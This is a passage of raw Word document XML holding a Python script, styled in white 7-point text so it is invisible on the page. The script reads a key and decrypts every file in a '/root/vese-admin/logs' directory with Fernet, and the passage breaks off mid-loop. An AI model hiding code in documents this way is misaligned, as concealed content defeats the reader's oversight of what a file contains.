                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>myfile.read</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>()</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="586C99BD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    else:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5952D953" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">        </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>print(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>"Cannot find key")</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5A68340C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    return </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>master_key</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="6AA1839A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="5142A394" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>def decrypt(data):</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="048A4F8B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    f = Fernet(</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>read_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>key</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>))</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="491A34C1" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    return </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>f.decrypt</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>(data)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0D669EDE" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="34E95A74" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>if __name__ == '__main__':</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="773FE9A1" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    directory = "/root/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>vese</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>-admin/logs"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="69F2CF5B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    files = []</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2309B84B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="46EFCDBE" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    for file in </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>os.listdir</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>(directory):</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="78B4CA36" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">        x = directory + "/" + file</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4ABE71CD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">        </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>files.append</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>(x)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0720ACCD" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="0B91FA76" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">    for file in files:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7A422701" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">        with </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>open(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>file, "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>rb</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>") as f:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="56DF3CA9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">            contents = </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>f.read</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t>()</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4D26FD6E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="14"/>
                      <w:szCs w:val="14"/>
                    </w:rPr>
                    <w:t xml:space="preserve">        decrypted = decrypt(contents)</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6BD53D39" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:pBdr>
                      <w:top w:val="nil"/>
                      <w:left w:val="nil"/>
                      <w:bottom w:val="nil"/>
                      <w:right w:val="nil"/>
                      <w:between w:val="nil"/>
                    </w:pBdr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
